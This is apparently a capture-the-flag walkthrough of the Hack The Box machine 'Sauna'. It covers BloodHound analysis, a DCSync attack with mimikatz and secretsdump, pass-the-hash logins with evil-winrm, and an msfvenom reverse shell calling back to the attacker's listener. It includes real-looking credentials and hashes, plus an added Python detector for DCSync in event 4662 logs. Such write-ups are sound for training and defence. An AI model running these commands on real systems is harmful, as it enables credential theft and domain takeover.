config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2023-08-25 13:25:56.918+0000 INFO Starting...
2023-08-25 13:25:57.564+0000 INFO This instance is ServerId{012fd76f} (012fd76f-f868-4f49-8648-df3c0a92529c)
2023-08-25 13:25:59.855+0000 INFO ======== Neo4j 4.4.16 ========
2023-08-25 13:26:04.131+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-08-25 13:26:04.154+0000 INFO Setting up initial user from defaults: neo4j
2023-08-25 13:26:04.155+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-08-25 13:26:04.181+0000 INFO Setting version for 'security-users' to 3
2023-08-25 13:26:04.188+0000 INFO After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-08-25 13:26:04.197+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-08-25 13:26:04.656+0000 INFO Bolt enabled on localhost:7687.
2023-08-25 13:26:06.692+0000 INFO Remote interface available at http://localhost:7474/
2023-08-25 13:26:06.699+0000 INFO id: 09D349E0C9FBBE2765953B684D37451EC5B3E5498A047128F86F8D612D552499
2023-08-25 13:26:06.700+0000 INFO name: system
2023-08-25 13:26:06.700+0000 INFO creationDate: 2023-08-25T13:26:01.864Z
2023-08-25 13:26:06.700+0000 INFO Started.
Go to http://localhost:7474/ and change the password.
Log in to BloodHound with the username/password.
Drag and drop the zip file into BloodHound.
Type svc in the search bar at the top, then do the same for fsmith.
Mark svc_loanmgr and fsmith as owned.
Go to Queries, Shortest Path from Owned Principals.
Click on Find Principals with DCSync Rights, then right-click on the edge.
We can use mimikatz for DCSync; Impacket also has a DCSync implementation (secretsdump.py).
Option 1 – using mimikatz. Uploaded mimikatz to the Windows machine; it can be found at https://github.com/ParrotSec/mimikatz
This did not work: mimikatz got stuck in a loop.
Option 2 – using Impacket's secretsdump.py:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./secretsdump.py egotistical-bank.local/[email protected]
Impacket's secretsdump.py failed numerous times with permission denied:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./secretsdump.py egotistical-bank.local/[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Cannot create "sessionresume_qmeaJHgo" resume session file: [Errno 13] Permission denied: 'sessionresume_qmeaJHgo'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
Going back to try the mimikatz route, but this time using Invoke-Mimikatz.ps1.
I got it with wget from https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 and then uploaded it to the machine.
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ wget https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
--2023-08-27 06:29:42-- https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 677282 (661K) [text/plain]
Saving to: ‘Invoke-Mimikatz.ps1’
Invoke-Mimikatz.ps1 100%[===================================================================================================================>] 661.41K --.-KB/s in 0.07s
2023-08-27 06:29:42 (8.71 MB/s) - ‘Invoke-Mimikatz.ps1’ saved [677282/677282]
┌──(kali㉿kali)-[~/HTB/Sauna]
Upload and run it on the machine.
There were issues running Invoke-Mimikatz, but this article helped: https://github.com/mitre/caldera/issues/38
Change the following line 886:
`$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')`
To
`$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);`
With this change it worked. Use the user svc_loanmgr:
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/HTB/Sauna/Invoke-Mimikatz.ps1
Info: Uploading /home/kali/HTB/Sauna/Invoke-Mimikatz.ps1 to C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1
Data: 3215032 bytes of 3215032 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> . .\Invoke-Mimikatz.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator"'
Access denied
At C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1:2579 char:27
+ $Processors = Get-WmiObject -Class Win32_Processor
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc_loanmgr\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ... if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: SAUNA.EGOTISTICAL-BANK.LOCAL / S-1-5-21-2966785786-3096785034-1186376766
.#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
mimikatz(powershell) # lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator
[DC] 'Egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/26/2021 9:16:16 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
lm - 0: 365ca60e4aba3e9a71d78a3912caf35c
lm - 1: 7af65ae5e7103761ae828523c7713031
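Added example (not part of the original notes): detection logic for the DCSync that the mimikatz output above shows svc_loanmgr performing. Replication is audited on the DC as event 4662 with the replication extended-right GUIDs in the Properties field, so the sample 4662 lines are constructed and the DC allowlist (SAUNA$) is an assumption for this lab domain.

```python
import re

# Extended-right GUIDs that together grant directory replication ("DCSync").
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # access-mask bit under which extended rights are audited in 4662

# Accounts that legitimately replicate: the domain controllers' machine accounts.
# Assumed allowlist for this lab; in production build it from the Domain Controllers OU.
KNOWN_DCS = {"SAUNA$"}

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}")

# Constructed sample 4662 records flattened to: <time>|<subject account>|<access mask>|<properties>
# Line 1 is a DC replicating normally; lines 2-3 are svc_loanmgr's dcsync from the
# mimikatz run above; line 4 reads an unrelated (made-up) property with a plain read mask.
SAMPLE_4662 = """\
2023-08-27T16:41:02Z|SAUNA$|0x100|{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
2023-08-27T16:44:31Z|svc_loanmgr|0x100|{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
2023-08-27T16:44:31Z|svc_loanmgr|0x100|{89e95b76-444d-4c62-991a-0facbeda640c}
2023-08-27T16:50:12Z|fsmith|0x10|{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}
"""


def parse_4662(text):
    """Split flattened 4662 records into dicts; the properties field becomes a GUID list."""
    events = []
    for line in text.splitlines():
        ts, subject, mask, props = line.split("|")
        events.append({
            "time": ts,
            "subject": subject,
            "mask": int(mask, 16),
            "properties": GUID_RE.findall(props.lower()),
        })
    return events


def replication_rights_used(event):
    """Names of the replication extended rights present in one event."""
    return [REPLICATION_RIGHTS[g] for g in event["properties"] if g in REPLICATION_RIGHTS]


def detect_dcsync(events, known_dcs=KNOWN_DCS):
    """One alert per non-DC account that exercised replication rights (Control Access)."""
    alerts = {}
    for ev in events:
        rights = replication_rights_used(ev)
        if not rights or not ev["mask"] & CONTROL_ACCESS or ev["subject"] in known_dcs:
            continue
        entry = alerts.setdefault(
            ev["subject"], {"subject": ev["subject"], "first_seen": ev["time"], "rights": set()}
        )
        entry["rights"].update(rights)
    return [dict(a, rights=sorted(a["rights"])) for a in alerts.values()]


if __name__ == "__main__":
    for alert in detect_dcsync(parse_4662(SAMPLE_4662)):
        print(f"[!] {alert['subject']} replicated directory secrets at {alert['first_seen']}: "
              + ", ".join(alert["rights"]))
```

The same GUIDs are what the BloodHound DCSync edge encodes, so the fix is the mirror image of the detection: remove those rights from svc_loanmgr on the domain object.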
Now we can pass the hash with the username Administrator and NTLM hash 823452073d75b9d1cf70ebdf86c7f98e
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e~
Evil-WinRM shell v3.5
Error: Invalid hash format
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/23/2020 3:11 PM 3D Objects
d-r--- 1/23/2020 3:11 PM Contacts
d-r--- 7/14/2021 3:35 PM Desktop
d-r--- 1/23/2020 3:11 PM Documents
d-r--- 1/23/2020 3:11 PM Downloads
d-r--- 1/23/2020 3:11 PM Favorites
d-r--- 1/23/2020 3:11 PM Links
d-r--- 1/23/2020 3:11 PM Music
d-r--- 1/23/2020 3:11 PM Pictures
d-r--- 1/23/2020 3:11 PM Saved Games
d-r--- 1/23/2020 3:11 PM Searches
d-r--- 1/23/2020 3:11 PM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/27/2023 9:38 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f2d1be3960ce7c6cde8ab677b5713616
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Will try and run mimikatz, which was initially failing over Evil-WinRM. We will get a reverse shell and run it from our Kali box.
Creating a reverse shell payload with msfvenom, then uploading it to the machine:
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.18 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
┌──(kali㉿kali)-[~/HTB/Sauna]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /home/kali/HTB/Sauna/shell.exe
Info: Uploading /home/kali/HTB/Sauna/shell.exe to C:\Users\svc_loanmgr\Documents\shell.exe
Run the reverse shell with listener
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> .\shell.exe
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
Upload and run mimikatz.exe from the reverse shell; this works and we get the same hash to pass.
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.175] 50175
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\svc_loanmgr\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\svc_loanmgr\Documents
08/27/2023 12:20 PM <DIR> .
08/27/2023 12:20 PM <DIR> ..
08/27/2023 11:39 AM 2,411,274 Invoke-Mimikatz.ps1
08/27/2023 12:21 PM 927,384 mimikatz.exe
08/27/2023 12:08 PM 73,802 reverse.exe
08/27/2023 12:01 PM 73,802 reverse_shell.exe
08/27/2023 12:18 PM 7,168 shell.exe
5 File(s) 3,493,430 bytes
2 Dir(s) 7,828,529,152 bytes free
C:\Users\svc_loanmgr\Documents>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50
mimikatz # lsadump::dcsync /domain:Egotistical-bank.local /user:Administrator
[DC] 'Egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/26/2021 9:16:16 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e